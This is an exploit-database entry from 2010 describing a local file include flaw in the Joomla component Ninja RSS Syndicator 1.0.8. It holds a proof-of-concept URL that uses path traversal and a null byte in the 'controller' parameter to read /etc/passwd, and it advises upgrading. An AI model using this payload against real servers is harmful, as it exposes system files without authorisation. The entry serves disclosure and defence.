header-logo
Suggest Exploit
vendor:
Ninja RSS Syndicator
by:
jdc
7,5
CVSS
HIGH
Local File Include
98
CWE
Product Name: Ninja RSS Syndicator
Affected Version From: 1.0.8
Affected Version To: 1.0.8
Patch Exists: YES
Related CWE: N/A
CPE: a:ninjaforge:ninja_rss_syndicator:1.0.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla component Ninja RSS Syndicator 1.0.8 Local File Include

This vulnerability allows an attacker to include a file from the local system, such as the /etc/passwd file, by manipulating the 'controller' parameter in the 'index.php' file of the Ninja RSS Syndicator component. This can be exploited to disclose sensitive information.

Mitigation:

Upgrade to the latest version of the Ninja RSS Syndicator component.
Source

Exploit-DB raw data:

Joomla component Ninja RSS Syndicator 1.0.8 Local File Include
Version     : 1.0.8
Author      : jdc
Download : 
http://ninjaforge.com/index.php?option=com_ninjacentral&page=show_package&id=74&Itemid=236

http://site/index.php?option=com_ninjarsssyndicator&controller=../../../../../etc/passwd%00

jdc 2010

Navigation

Suggest Exploit

Services By CQR